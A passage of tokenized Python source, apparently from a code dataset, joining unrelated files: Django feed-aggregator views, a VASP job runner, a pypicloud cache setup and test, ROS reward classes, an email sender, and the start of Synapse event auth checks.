"<STR_LIT>" : feeds_list } , context_instance = RequestContext ( request ) ) <EOL> def feed_detail ( request , feed_id , tag = None , slug = None ) : <EOL> feed = get_object_or_404 ( Feed , pk = feed_id ) <EOL> if not slug : <EOL> return redirect ( feed , permanent = True ) <EOL> if tag : <EOL> tag = get_object_or_404 ( Tag , name = tag ) <EOL> posts = TaggedItem . objects . get_by_model ( <EOL> Post . site_objects , tag ) . filter ( feed = feed ) . order_by ( "<STR_LIT>" ) <EOL> else : <EOL> posts = Post . site_objects . filter ( feed = feed ) . order_by ( "<STR_LIT>" ) <EOL> return render_to_response ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : feed , "<STR_LIT>" : posts , "<STR_LIT>" : tag } , <EOL> context_instance = RequestContext ( request ) ) <EOL> def authors_list ( request ) : <EOL> authors = Author . site_objects . all ( ) <EOL> return render_to_response ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : authors } , <EOL> context_instance = RequestContext ( request ) ) <EOL> def author_detail ( request , author_id , tag = None , slug = None ) : <EOL> author = get_object_or_404 ( Author , pk = author_id ) <EOL> if not slug : <EOL> return redirect ( author , permanent = True ) <EOL> if tag : <EOL> tag = get_object_or_404 ( Tag , name = tag ) <EOL> posts = TaggedItem . objects . get_by_model ( Post . site_objects , tag ) . filter ( <EOL> authors = author ) . order_by ( "<STR_LIT>" ) <EOL> else : <EOL> posts = Post . site_objects . filter ( <EOL> authors = author ) . order_by ( "<STR_LIT>" ) <EOL> return render_to_response ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : author , "<STR_LIT>" : posts , "<STR_LIT>" : tag } , <EOL> context_instance = RequestContext ( request ) ) <EOL> def posts_list ( request ) : <EOL> posts = Post . site_objects . all ( ) . select_related ( "<STR_LIT>" , "<STR_LIT>" ) . prefetch_related ( "<STR_LIT>" ) . order_by ( "<STR_LIT>" ) <EOL> return render_to_response ( "<STR_LIT>" , { "<STR_LIT>" : posts } , <EOL> context_instance = RequestContext ( request ) ) <EOL> def post_detail ( request , post_id , slug = None ) : <EOL> post = get_object_or_404 ( <EOL> Post . objects . select_related ( "<STR_LIT>" , "<STR_LIT>" ) . prefetch_related ( "<STR_LIT>" ) , <EOL> pk = post_id <EOL> ) <EOL> if not slug : <EOL> return redirect ( post , permanent = True ) <EOL> return render_to_response ( "<STR_LIT>" , { "<STR_LIT>" : post } , <EOL> context_instance = RequestContext ( request ) ) <EOL> def tag_detail ( request , tag ) : <EOL> tag = get_object_or_404 ( Tag , name = tag ) <EOL> posts = TaggedItem . objects . get_by_model ( <EOL> Post . site_objects , tag ) . order_by ( "<STR_LIT>" ) <EOL> return render_to_response ( "<STR_LIT>" , { "<STR_LIT>" : posts , <EOL> "<STR_LIT>" : tag } , context_instance = RequestContext ( request ) ) <EOL> def tag_authors_list ( request , tag ) : <EOL> tag = get_object_or_404 ( Tag , name = tag ) <EOL> posts_list = TaggedItem . objects . get_by_model ( Post . site_objects , tag ) <EOL> authors = set ( ) <EOL> for post in posts_list : <EOL> for author in post . authors . all ( ) : <EOL> authors . add ( author ) <EOL> return render_to_response ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : list ( authors ) , "<STR_LIT>" : tag } , <EOL> context_instance = RequestContext ( request ) ) <EOL> def tag_feeds_list ( request , tag ) : <EOL> tag = get_object_or_404 ( Tag , name = tag ) <EOL> post_ids = TaggedItem . objects . get_by_model ( Post . site_objects , tag <EOL> ) . values_list ( "<STR_LIT:id>" , flat = True ) <EOL> feeds_list = Feed . site_objects . filter ( post__in = post_ids ) . distinct ( ) <EOL> return render_to_response ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : feeds_list , "<STR_LIT>" : tag } , <EOL> context_instance = RequestContext ( request ) ) <EOL> def tags_cloud ( request , min_posts_count = <NUM_LIT:1> ) : <EOL> tags_cloud = Tag . objects . cloud_for_model ( Post ) <EOL> return render_to_response ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : tags_cloud } , context_instance = RequestContext ( request ) ) <EOL> def foaf ( request ) : <EOL> feeds = Feed . site_objects . all ( ) . select_related ( "<STR_LIT>" ) <EOL> return render_to_response ( "<STR_LIT>" , { "<STR_LIT>" : feeds } , <EOL> context_instance = RequestContext ( request ) , content_type = "<STR_LIT>" ) <EOL> def opml ( request ) : <EOL> feeds = Feed . site_objects . all ( ) . select_related ( "<STR_LIT>" ) <EOL> return render_to_response ( "<STR_LIT>" , { "<STR_LIT>" : feeds } , <EOL> context_instance = RequestContext ( request ) , content_type = "<STR_LIT>" ) <EOL> def search ( request ) : <EOL> if request . method == "<STR_LIT:GET>" and request . GET . get ( "<STR_LIT>" ) == "<STR_LIT>" : <EOL> search_form = SearchForm ( request . GET ) <EOL> if search_form . is_valid ( ) : <EOL> query = search_form . cleaned_data [ "<STR_LIT:q>" ] <EOL> if search_form . cleaned_data [ "<STR_LIT:w>" ] == "<STR_LIT>" : <EOL> params_dict = { "<STR_LIT>" : query } <EOL> posts = Post . site_objects . filter ( ** params_dict <EOL> ) . distinct ( ) . order_by ( "<STR_LIT>" ) <EOL> return render_to_response ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : posts } , context_instance = RequestContext ( request ) ) <EOL> elif search_form . cleaned_data [ "<STR_LIT:w>" ] == "<STR_LIT>" : <EOL> params_dict = { "<STR_LIT>" : query } <EOL> tags_list = Tag . objects . filter ( ** params_dict <EOL> ) . distinct ( ) . order_by ( "<STR_LIT:name>" ) <EOL> return render_to_response ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : tags_list } , <EOL> context_instance = RequestContext ( request ) ) <EOL> elif search_form . cleaned_data [ "<STR_LIT:w>" ] == "<STR_LIT>" : <EOL> params_dict = { "<STR_LIT>" : query } <EOL> blogs_list = Blog . site_objects . filter ( ** params_dict <EOL> ) . order_by ( "<STR_LIT:title>" ) <EOL> return render_to_response ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : blogs_list } , <EOL> context_instance = RequestContext ( request ) ) <EOL> elif search_form . cleaned_data [ "<STR_LIT:w>" ] == "<STR_LIT>" : <EOL> params_dict = { "<STR_LIT>" : query } <EOL> feeds_list = Feed . site_objects . filter ( ** params_dict <EOL> ) . order_by ( "<STR_LIT:title>" ) <EOL> return render_to_response ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : feeds_list } , <EOL> context_instance = RequestContext ( request ) ) <EOL> elif search_form . cleaned_data [ "<STR_LIT:w>" ] == "<STR_LIT>" : <EOL> params_dict = { "<STR_LIT>" : query } <EOL> authors_list = Author . site_objects . filter ( ** params_dict <EOL> ) . order_by ( "<STR_LIT:name>" ) <EOL> return render_to_response ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : authors_list } , <EOL> context_instance = RequestContext ( request ) ) <EOL> else : <EOL> return HttpResponseRedirect ( reverse ( "<STR_LIT>" ) ) <EOL> else : <EOL> return HttpResponseRedirect ( reverse ( "<STR_LIT>" ) ) <EOL> else : <EOL> return HttpResponseRedirect ( reverse ( "<STR_LIT>" ) ) <EOL> class FeedAddView ( CreateView ) : <EOL> model = Feed <EOL> fields = [ "<STR_LIT:url>" ] <EOL> template_name = '<STR_LIT>' <EOL> success_message = _ ( "<STR_LIT>" ) <EOL> def clean_url ( self ) : <EOL> url = self . cleaned_data [ '<STR_LIT:url>' ] <EOL> if Feed . objects . filter ( url = url ) . count ( ) > <NUM_LIT:0> : <EOL> raise ValidationError ( _ ( '<STR_LIT>' ) ) <EOL> return url <EOL> def form_valid ( self , form ) : <EOL> feed = form . save ( ) <EOL> if self . request . user . is_authenticated ( ) : <EOL> feed . blog . owner = self . request . user <EOL> feed . blog . save ( ) <EOL> self . object = feed <EOL> return HttpResponseRedirect ( reverse ( "<STR_LIT>" ) ) <EOL> class BlogListByUserView ( ListView ) : <EOL> template_name = '<STR_LIT>' <EOL> model = Blog <EOL> def get_queryset ( self ) : <EOL> return Blog . objects . filter ( owner = self . request . user ) <EOL> class OwnedObjectMixin ( SingleObjectMixin ) : <EOL> """<STR_LIT>""" <EOL> def get_object ( self , * args , ** kwargs ) : <EOL> obj = super ( OwnedObjectMixin , self ) . get_object ( * args , ** kwargs ) <EOL> try : <EOL> if not obj . owner == self . request . user : <EOL> raise Http404 ( ) <EOL> except AttributeError : <EOL> pass <EOL> return obj <EOL> class BlogDeleteView ( DeleteView , OwnedObjectMixin ) : <EOL> template_name = '<STR_LIT>' <EOL> model = Blog <EOL> success_url = reverse_lazy ( '<STR_LIT>' ) </s>
<s> from __future__ import unicode_literals , division <EOL> """<STR_LIT>""" <EOL> __author__ = "<STR_LIT>" <EOL> __version__ = "<STR_LIT>" <EOL> __maintainer__ = "<STR_LIT>" <EOL> __email__ = "<STR_LIT>" <EOL> __status__ = "<STR_LIT>" <EOL> __date__ = "<STR_LIT>" <EOL> import subprocess <EOL> import os <EOL> import shutil <EOL> import math <EOL> import logging <EOL> from pymatgen . io . vasp import VaspInput , Incar , Poscar , Outcar , Kpoints <EOL> from pymatgen . io . smart import read_structure <EOL> from pymatgen . io . vasp . sets import MITVaspInputSet <EOL> from monty . json import MontyDecoder <EOL> from monty . os . path import which <EOL> from custodian . custodian import Job <EOL> from custodian . vasp . interpreter import VaspModder <EOL> VASP_INPUT_FILES = { "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" } <EOL> VASP_OUTPUT_FILES = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class VaspJob ( Job ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , vasp_cmd , output_file = "<STR_LIT>" , suffix = "<STR_LIT>" , <EOL> final = True , backup = True , <EOL> default_vasp_input_set = MITVaspInputSet ( ) , auto_npar = True , <EOL> auto_gamma = True , settings_override = None , <EOL> gamma_vasp_cmd = None , copy_magmom = False ) : <EOL> """<STR_LIT>""" <EOL> self . vasp_cmd = vasp_cmd <EOL> self . output_file = output_file <EOL> self . final = final <EOL> self . backup = backup <EOL> self . default_vis = default_vasp_input_set <EOL> self . suffix = suffix <EOL> self . settings_override = settings_override <EOL> self . auto_npar = auto_npar <EOL> self . auto_gamma = auto_gamma <EOL> self . gamma_vasp_cmd = gamma_vasp_cmd <EOL> self . copy_magmom = copy_magmom <EOL> def setup ( self ) : <EOL> """<STR_LIT>""" <EOL> files = os . listdir ( "<STR_LIT:.>" ) <EOL> num_structures = <NUM_LIT:0> <EOL> if not set ( files ) . issuperset ( VASP_INPUT_FILES ) : <EOL> for f in files : <EOL> try : <EOL> struct = read_structure ( f ) <EOL> num_structures += <NUM_LIT:1> <EOL> except : <EOL> pass <EOL> if num_structures != <NUM_LIT:1> : <EOL> raise RuntimeError ( "<STR_LIT>" <EOL> . format ( num_structures ) ) <EOL> else : <EOL> self . default_vis . write_input ( struct , "<STR_LIT:.>" ) <EOL> if self . backup : <EOL> for f in VASP_INPUT_FILES : <EOL> shutil . copy ( f , "<STR_LIT>" . format ( f ) ) <EOL> if self . auto_npar : <EOL> try : <EOL> incar = Incar . from_file ( "<STR_LIT>" ) <EOL> if not ( incar . get ( "<STR_LIT>" ) or incar . get ( "<STR_LIT>" ) or <EOL> incar . get ( "<STR_LIT>" ) ) : <EOL> if incar . get ( "<STR_LIT>" ) in [ <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> ] : <EOL> del incar [ "<STR_LIT>" ] <EOL> else : <EOL> import multiprocessing <EOL> ncores = os . environ . get ( '<STR_LIT>' ) or multiprocessing . cpu_count ( ) <EOL> ncores = int ( ncores ) <EOL> for npar in range ( int ( math . sqrt ( ncores ) ) , <EOL> ncores ) : <EOL> if ncores % npar == <NUM_LIT:0> : <EOL> incar [ "<STR_LIT>" ] = npar <EOL> break <EOL> incar . write_file ( "<STR_LIT>" ) <EOL> except : <EOL> pass <EOL> if self . settings_override is not None : <EOL> VaspModder ( ) . apply_actions ( self . settings_override ) <EOL> def run ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = list ( self . vasp_cmd ) <EOL> if self . auto_gamma : <EOL> vi = VaspInput . from_directory ( "<STR_LIT:.>" ) <EOL> kpts = vi [ "<STR_LIT>" ] <EOL> if kpts . style == Kpoints . supported_modes . Gamma and tuple ( kpts . kpts [ <NUM_LIT:0> ] ) == ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) : <EOL> if self . gamma_vasp_cmd is not None and which ( <EOL> self . gamma_vasp_cmd [ - <NUM_LIT:1> ] ) : <EOL> cmd = self . gamma_vasp_cmd <EOL> elif which ( cmd [ - <NUM_LIT:1> ] + "<STR_LIT>" ) : <EOL> cmd [ - <NUM_LIT:1> ] += "<STR_LIT>" <EOL> logging . info ( "<STR_LIT>" . format ( "<STR_LIT:U+0020>" . join ( cmd ) ) ) <EOL> with open ( self . output_file , '<STR_LIT:w>' ) as f : <EOL> p = subprocess . Popen ( cmd , stdout = f ) <EOL> return p <EOL> def postprocess ( self ) : <EOL> """<STR_LIT>""" <EOL> for f in VASP_OUTPUT_FILES + [ self . output_file ] : <EOL> if os . path . exists ( f ) : <EOL> if self . final and self . suffix != "<STR_LIT>" : <EOL> shutil . move ( f , "<STR_LIT>" . format ( f , self . suffix ) ) <EOL> elif self . suffix != "<STR_LIT>" : <EOL> shutil . copy ( f , "<STR_LIT>" . format ( f , self . suffix ) ) <EOL> if self . copy_magmom and not self . final : <EOL> try : <EOL> outcar = Outcar ( "<STR_LIT>" ) <EOL> magmom = [ m [ '<STR_LIT>' ] for m in outcar . magnetization ] <EOL> incar = Incar . from_file ( "<STR_LIT>" ) <EOL> incar [ '<STR_LIT>' ] = magmom <EOL> incar . write_file ( "<STR_LIT>" ) <EOL> except : <EOL> logging . error ( '<STR_LIT>' ) <EOL> @ classmethod <EOL> def double_relaxation_run ( cls , vasp_cmd , auto_npar = True ) : <EOL> """<STR_LIT>""" <EOL> return [ VaspJob ( vasp_cmd , final = False , suffix = "<STR_LIT>" , <EOL> auto_npar = auto_npar ) , <EOL> VaspJob ( <EOL> vasp_cmd , final = True , backup = False , <EOL> suffix = "<STR_LIT>" , auto_npar = auto_npar , <EOL> settings_override = [ <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:action>" : { "<STR_LIT>" : { "<STR_LIT>" : <NUM_LIT:1> } } } , <EOL> { "<STR_LIT:file>" : "<STR_LIT>" , <EOL> "<STR_LIT:action>" : { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } } } ] ) ] <EOL> @ classmethod <EOL> def full_opt_run ( cls , vasp_cmd , auto_npar = True , vol_change_tol = <NUM_LIT> , <EOL> max_steps = <NUM_LIT:10> ) : <EOL> """<STR_LIT>""" <EOL> for i in xrange ( max_steps ) : <EOL> if i == <NUM_LIT:0> : <EOL> settings = None <EOL> backup = True <EOL> else : <EOL> backup = False <EOL> initial = Poscar . from_file ( "<STR_LIT>" ) . structure <EOL> final = Poscar . from_file ( "<STR_LIT>" ) . structure <EOL> vol_change = ( final . volume - initial . volume ) / initial . volume <EOL> logging . info ( "<STR_LIT>" % ( vol_change * <NUM_LIT:100> ) ) <EOL> if abs ( vol_change ) < vol_change_tol : <EOL> logging . info ( "<STR_LIT>" ) <EOL> break <EOL> else : <EOL> settings = [ <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:action>" : { "<STR_LIT>" : { "<STR_LIT>" : <NUM_LIT:1> } } } , <EOL> { "<STR_LIT:file>" : "<STR_LIT>" , <EOL> "<STR_LIT:action>" : { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } } } ] <EOL> logging . info ( "<STR_LIT>" % ( i + <NUM_LIT:1> ) ) <EOL> yield VaspJob ( vasp_cmd , final = False , backup = backup , <EOL> suffix = "<STR_LIT>" % ( i + <NUM_LIT:1> ) , auto_npar = auto_npar , <EOL> settings_override = settings ) <EOL> def as_dict ( self ) : <EOL> d = dict ( vasp_cmd = self . vasp_cmd , <EOL> output_file = self . output_file , suffix = self . suffix , <EOL> final = self . final , backup = self . backup , <EOL> default_vasp_input_set = self . default_vis . as_dict ( ) , <EOL> auto_npar = self . auto_npar , auto_gamma = self . auto_gamma , <EOL> settings_override = self . settings_override , <EOL> gamma_vasp_cmd = self . gamma_vasp_cmd <EOL> ) <EOL> d [ "<STR_LIT>" ] = self . __class__ . __module__ <EOL> d [ "<STR_LIT>" ] = self . __class__ . __name__ <EOL> return d <EOL> @ classmethod <EOL> def from_dict ( cls , d ) : <EOL> vis = MontyDecoder ( ) . process_decoded ( d [ "<STR_LIT>" ] ) <EOL> return VaspJob ( <EOL> vasp_cmd = d [ "<STR_LIT>" ] , output_file = d [ "<STR_LIT>" ] , <EOL> suffix = d [ "<STR_LIT>" ] , final = d [ "<STR_LIT>" ] , <EOL> backup = d [ "<STR_LIT>" ] , default_vasp_input_set = vis , <EOL> auto_npar = d [ '<STR_LIT>' ] , auto_gamma = d [ '<STR_LIT>' ] , <EOL> settings_override = d [ "<STR_LIT>" ] , <EOL> gamma_vasp_cmd = d [ "<STR_LIT>" ] ) </s>
<s> """<STR_LIT>""" <EOL> from functools import partial <EOL> from pyramid . path import DottedNameResolver <EOL> from . base import ICache <EOL> from . redis_cache import RedisCache <EOL> from . sql import SQLCache <EOL> def includeme ( config ) : <EOL> """<STR_LIT>""" <EOL> settings = config . get_settings ( ) <EOL> resolver = DottedNameResolver ( __name__ ) <EOL> dotted_cache = settings . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if dotted_cache == '<STR_LIT>' : <EOL> dotted_cache = '<STR_LIT>' <EOL> elif dotted_cache == '<STR_LIT>' : <EOL> dotted_cache = '<STR_LIT>' <EOL> elif dotted_cache == '<STR_LIT>' : <EOL> dotted_cache = '<STR_LIT>' <EOL> cache_impl = resolver . resolve ( dotted_cache ) <EOL> kwargs = cache_impl . configure ( settings ) <EOL> cache = cache_impl ( ** kwargs ) <EOL> cache . reload_if_needed ( ) <EOL> config . add_request_method ( partial ( cache_impl , ** kwargs ) , name = '<STR_LIT>' , <EOL> reify = True ) <EOL> return cache_impl </s>
<s> """<STR_LIT>""" <EOL> from mock import MagicMock <EOL> from . import MockServerTest <EOL> from pypicloud . views . packages import list_packages <EOL> class TestPackages ( MockServerTest ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( TestPackages , self ) . setUp ( ) <EOL> self . request . access = MagicMock ( ) <EOL> def test_list_packages ( self ) : <EOL> """<STR_LIT>""" <EOL> self . request . db = MagicMock ( ) <EOL> self . request . db . distinct . return_value = [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] <EOL> self . request . access . has_permission . side_effect = lambda x , _ : x == '<STR_LIT:b>' or x == '<STR_LIT:c>' <EOL> def get_packages ( x ) : <EOL> """<STR_LIT>""" <EOL> def mm ( package_name ) : <EOL> """<STR_LIT>""" <EOL> p = MagicMock ( ) <EOL> p . filename = package_name <EOL> p . get_url . return_value = package_name + "<STR_LIT>" <EOL> return p <EOL> d = { <EOL> '<STR_LIT:a>' : [ mm ( '<STR_LIT>' ) , mm ( '<STR_LIT>' ) ] , <EOL> '<STR_LIT:b>' : [ mm ( '<STR_LIT>' ) ] , <EOL> '<STR_LIT:c>' : [ mm ( '<STR_LIT>' ) , mm ( '<STR_LIT>' ) , mm ( '<STR_LIT>' ) ] <EOL> } <EOL> return d . get ( x , [ ] ) <EOL> self . request . db . all . side_effect = get_packages <EOL> result = list_packages ( self . request ) <EOL> expected = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> self . assertEqual ( result , { '<STR_LIT>' : expected } ) </s>
<s> import rospy <EOL> from nav_msgs . msg import Odometry <EOL> import sys <EOL> import time <EOL> def close ( p1 , p2 ) : <EOL> diff = abs ( p1 . x - p2 . x ) + abs ( p1 . y - p2 . y ) + abs ( p1 . z - p2 . z ) <EOL> return diff < <NUM_LIT> <EOL> def grid_pt_for_pos ( pos ) : <EOL> gx , gy = int ( pos . x / <NUM_LIT:2> ) , int ( pos . y / <NUM_LIT:2> ) <EOL> return gx + <NUM_LIT:5> * gy <EOL> class MovingOdomReward ( object ) : <EOL> def __init__ ( self , robot_id ) : <EOL> self . robot_id = robot_id <EOL> self . reset ( ) <EOL> rospy . Subscriber ( "<STR_LIT>" % self . robot_id , Odometry , self . odom_callback ) <EOL> def reset ( self ) : <EOL> self . last_pos = None <EOL> self . latest_pos = None <EOL> def odom_callback ( self , msg ) : <EOL> self . latest_pos = msg . pose . pose . position <EOL> def reward ( self , last_action ) : <EOL> if self . latest_pos == None : <EOL> return <NUM_LIT:0> <EOL> if self . last_pos == None : <EOL> self . last_pos = self . latest_pos <EOL> return <NUM_LIT:0> <EOL> r = <NUM_LIT:0> <EOL> if last_action == <NUM_LIT:0> : <EOL> moved = not close ( self . latest_pos , self . last_pos ) <EOL> r = <NUM_LIT:1> if moved else - <NUM_LIT:1> <EOL> self . last_pos = self . latest_pos <EOL> return r <EOL> class CoarseGridOdomReward ( object ) : <EOL> REWARD_MOVE_FORWARD_A_BIT = <NUM_LIT:1> <EOL> REWARD_MOVE_FORWARD_ONE_GRID = <NUM_LIT:0> <EOL> REWARD_MOVE_BACKWARD_ONE_GRID = <NUM_LIT:0> <EOL> GRID_ORDER = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:9> , <NUM_LIT:4> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:7> , <NUM_LIT:12> , <NUM_LIT:11> , <NUM_LIT:10> , <NUM_LIT:15> , <NUM_LIT:20> , <NUM_LIT> ] <EOL> LEN = len ( GRID_ORDER ) <EOL> def __init__ ( self , robot_id ) : <EOL> self . robot_id = robot_id <EOL> self . reset ( ) <EOL> rospy . Subscriber ( "<STR_LIT>" % self . robot_id , Odometry , self . odom_callback ) <EOL> def reset ( self ) : <EOL> self . last_pos = None <EOL> self . latest_pos = None <EOL> def odom_callback ( self , msg ) : <EOL> self . latest_pos = msg . pose . pose . position <EOL> def reward ( self ) : <EOL> if self . latest_pos == None : <EOL> return <NUM_LIT:0> <EOL> if self . last_pos == None : <EOL> self . last_pos = self . latest_pos <EOL> return <NUM_LIT:0> <EOL> latest_grid_idx = OdomReward . GRID_ORDER . index ( grid_pt_for_pos ( self . latest_pos ) ) <EOL> last_grid_idx = OdomReward . GRID_ORDER . index ( grid_pt_for_pos ( self . last_pos ) ) <EOL> r = None <EOL> wrap = len ( OdomReward . GRID_ORDER ) <EOL> if latest_grid_idx == last_grid_idx : <EOL> if close ( self . latest_pos , self . last_pos ) : <EOL> r = <NUM_LIT:0> <EOL> else : <EOL> r = REWARD_MOVE_FORWARD_A_BIT <EOL> elif latest_grid_idx == ( last_grid_idx + <NUM_LIT:1> ) % wrap : <EOL> r = REWARD_MOVE_FORWARD_ONE_GRID <EOL> elif latest_grid_idx == ( last_grid_idx - <NUM_LIT:1> ) % wrap : <EOL> r = REWARD_MOVE_BACKWARD_ONE_GRID <EOL> else : <EOL> print >> sys . stderr , "<STR_LIT>" <EOL> self . last_pos = None <EOL> return <NUM_LIT:0> <EOL> self . last_pos = self . latest_pos <EOL> return r </s>
<s> from getpass import getpass <EOL> try : <EOL> get_input = raw_input <EOL> except NameError : <EOL> get_input = input <EOL> def get_user_details ( argv ) : <EOL> if len ( argv ) > <NUM_LIT:1> : <EOL> host = argv [ <NUM_LIT:1> ] <EOL> else : <EOL> host = get_input ( "<STR_LIT>" ) <EOL> if len ( argv ) > <NUM_LIT:2> : <EOL> username = argv [ <NUM_LIT:2> ] <EOL> else : <EOL> username = get_input ( "<STR_LIT>" ) <EOL> if len ( argv ) > <NUM_LIT:3> : <EOL> password = argv [ <NUM_LIT:3> ] <EOL> else : <EOL> password = getpass ( ) <EOL> return host , username , password </s>
<s> import logging <EOL> import os <EOL> import random <EOL> import smtplib <EOL> import email . utils <EOL> import string <EOL> import twisted . python . log <EOL> import cgi <EOL> import urllib <EOL> import email . utils <EOL> from sydent . util import time_msec <EOL> logger = logging . getLogger ( __name__ ) <EOL> def sendEmail ( sydent , templateName , mailTo , substitutions ) : <EOL> mailFrom = sydent . cfg . get ( '<STR_LIT:email>' , '<STR_LIT>' ) <EOL> mailTemplateFile = sydent . cfg . get ( '<STR_LIT:email>' , templateName ) <EOL> myHostname = os . uname ( ) [ <NUM_LIT:1> ] <EOL> midRandom = "<STR_LIT>" . join ( [ random . choice ( string . ascii_letters ) for _ in range ( <NUM_LIT:16> ) ] ) <EOL> messageid = "<STR_LIT>" % ( time_msec ( ) , midRandom , myHostname ) <EOL> allSubstitutions = { } <EOL> allSubstitutions . update ( substitutions ) <EOL> allSubstitutions . update ( { <EOL> '<STR_LIT>' : messageid , <EOL> '<STR_LIT:date>' : email . utils . formatdate ( localtime = False ) , <EOL> '<STR_LIT:to>' : mailTo , <EOL> '<STR_LIT>' : mailFrom , <EOL> } ) <EOL> for k , v in allSubstitutions . items ( ) : <EOL> allSubstitutions [ k ] = v . decode ( '<STR_LIT:utf8>' ) <EOL> allSubstitutions [ k + "<STR_LIT>" ] = cgi . escape ( v . decode ( '<STR_LIT:utf8>' ) ) <EOL> allSubstitutions [ k + "<STR_LIT>" ] = urllib . quote ( v ) <EOL> mailString = open ( mailTemplateFile ) . read ( ) % allSubstitutions <EOL> rawFrom = email . utils . parseaddr ( mailFrom ) [ <NUM_LIT:1> ] <EOL> rawTo = email . utils . parseaddr ( mailTo ) [ <NUM_LIT:1> ] <EOL> if rawFrom == '<STR_LIT>' or rawTo == '<STR_LIT>' : <EOL> logger . info ( "<STR_LIT>" , mailFrom , mailTo ) <EOL> raise EmailAddressException ( ) <EOL> mailServer = sydent . cfg . get ( '<STR_LIT:email>' , '<STR_LIT>' ) <EOL> logger . info ( "<STR_LIT>" % ( mailTo , mailServer , ) ) <EOL> try : <EOL> smtp = smtplib . SMTP ( mailServer ) <EOL> smtp . sendmail ( rawFrom , rawTo , mailString . encode ( '<STR_LIT:utf-8>' ) ) <EOL> smtp . quit ( ) <EOL> except Exception as origException : <EOL> twisted . python . log . err ( ) <EOL> ese = EmailSendException ( ) <EOL> ese . cause = origException <EOL> raise ese <EOL> class EmailAddressException ( Exception ) : <EOL> pass <EOL> class EmailSendException ( Exception ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> from canonicaljson import encode_canonical_json <EOL> from signedjson . key import decode_verify_key_bytes <EOL> from signedjson . sign import verify_signed_json , SignatureVerifyException <EOL> from twisted . internet import defer <EOL> from synapse . api . constants import EventTypes , Membership , JoinRules <EOL> from synapse . api . errors import AuthError , Codes , SynapseError , EventSizeError <EOL> from synapse . types import Requester , RoomID , UserID , EventID <EOL> from synapse . util . logutils import log_function <EOL> from synapse . util . logcontext import preserve_context_over_fn <EOL> from unpaddedbase64 import decode_base64 <EOL> import logging <EOL> import pymacaroons <EOL> logger = logging . getLogger ( __name__ ) <EOL> AuthEventTypes = ( <EOL> EventTypes . Create , EventTypes . Member , EventTypes . PowerLevels , <EOL> EventTypes . JoinRules , EventTypes . RoomHistoryVisibility , <EOL> EventTypes . ThirdPartyInvite , <EOL> ) <EOL> class Auth ( object ) : <EOL> def __init__ ( self , hs ) : <EOL> self . hs = hs <EOL> self . store = hs . get_datastore ( ) <EOL> self . state = hs . get_state_handler ( ) <EOL> self . TOKEN_NOT_FOUND_HTTP_STATUS = <NUM_LIT> <EOL> self . _KNOWN_CAVEAT_PREFIXES = set ( [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] ) <EOL> def check ( self , event , auth_events ) : <EOL> """<STR_LIT>""" <EOL> self . check_size_limits ( event ) <EOL> try : <EOL> if not hasattr ( event , "<STR_LIT>" ) : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" % event ) <EOL> if auth_events is None : <EOL> logger . warn ( "<STR_LIT>" , event . event_id ) <EOL> return True <EOL> if event . type == EventTypes . Create : <EOL> return True <EOL> creation_event = auth_events . get ( ( EventTypes . Create , "<STR_LIT>" ) , None ) <EOL> if not creation_event : <EOL> raise SynapseError ( <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" % ( event . room_id , ) <EOL> ) <EOL> creating_domain = RoomID . from_string ( event . room_id ) . domain <EOL> originating_domain = UserID . from_string ( event . sender ) . domain <EOL> if creating_domain != originating_domain : <EOL> if not self . can_federate ( event , auth_events ) : <EOL> raise AuthError ( <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" <EOL> ) <EOL> if event . type == EventTypes . Aliases : <EOL> return True <EOL> logger . debug ( <EOL> "<STR_LIT>" , <EOL> [ a . event_id for a in auth_events . values ( ) ] <EOL> ) <EOL> if event . type == EventTypes . Member : <EOL> allowed = self . is_membership_change_allowed ( <EOL> event , auth_events <EOL> ) <EOL> if allowed : <EOL> logger . debug ( "<STR_LIT>" , event ) <EOL> else : <EOL> logger . debug ( "<STR_LIT>" , event ) <EOL> return allowed <EOL> self . check_event_sender_in_room ( event , auth_events ) <EOL> self . _can_send_event ( event , auth_events ) <EOL> if event . type == EventTypes . PowerLevels : <EOL> self . _check_power_levels ( event , auth_events ) <EOL> if event . type == EventTypes . Redaction : <EOL> self . check_redaction ( event , auth_events ) <EOL> logger . 